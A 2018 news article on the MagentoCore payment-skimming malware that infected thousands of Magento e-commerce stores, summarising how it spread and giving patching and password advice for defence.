Posted on September 3, 2018 at 4:30 PM
A recent analysis of e-commerce stores from around the globe has revealed a huge problem — thousands of these stores have discovered to already be infected by a payment-skimming malware. Not only that, but the malware continues to spread to 50+ new stores on a daily basis.
New malware detected
According to a new report by Willem de Groot, a researcher and security blogger, there is a new malware that has already managed to infect thousands of e-commerce stores. He named the new threat MagentoCore, due to the fact that it infected Magento, an e-commerce software.
Furthermore, de Groot stated that the malware has been placed on almost 7,340 stores within the last six months. It turned these stores into what can only be described as zombie money machines. Because of this, de Groot called this skimmer the most successful one ever.
He claims that the malware has made an entire list of victims that include large companies, as well as customers who have their identities and card data stolen. He estimated that the malware creators have earned quite a profit after months of operating undetected.
How does MagentoCore work?
According to de Groot, MagentoCore works by infecting the sites via a brute-force attack. It is trying to guess the passwords used by Magento admin panel until it cracks it, which can often take months. After gaining access, it injects a malicious piece of code into the site’s HTML. The site will then record the customers’ keystrokes, and send them back to the main server used by the hacker. The server captures all kinds of private data, like passwords, usernames, personal details, and even credit card data.
Additionally, the malware has a recovery mechanism as well. This mechanism deletes the code after running it, but it also redownloads it for future breaches. De Groot has analyzed over 220,000 sites and has discovered that over 4% of them are infected with MagentoCore.
4.2% of all Magento stores globally are currently leaking payment and customer data pic.twitter.com/Utw9W3t3Oa
— Willem de Groot (@gwillem) August 27, 2018
As for the website with .au domain, there are a little over 100 of them that are infected at this time. However, this is only a rough estimate, and the real number might be much higher.
Defending against the malware threat
David Markus, the founder of Combo IT services company, stated that malware attacks like this often come due to the fact that business owners neglect to keep their software up-to-date. Additionally, the password security is also lacking, which is why more and more of these attacks are becoming possible.
Markus stated that he himself neglected to keep his firm’s website updated, which has resulted in infiltration by the hackers. He said that the incident taught him a lesson, despite the fact that the hackers only changed a bit of text, which is not nearly as serious as what is currently going on with MagentoCore.
He continued by encouraging business owners to constantly keep an eye out on any new patches, which should be implemented immediately. De Groot also advised every business that suspects that it might be infected to follow some key steps on the road to recovery. Those include locating the flaw immediately and closing all points of access as soon as they are discovered.
After that is done, de Groot advises the complete restoration of the website to a code version that the owners are sure is safe. Finally, each business should have security procedures that are to be followed routinely, but mostly the implementation of regular patches, as well as strong passwords for the website’s staff.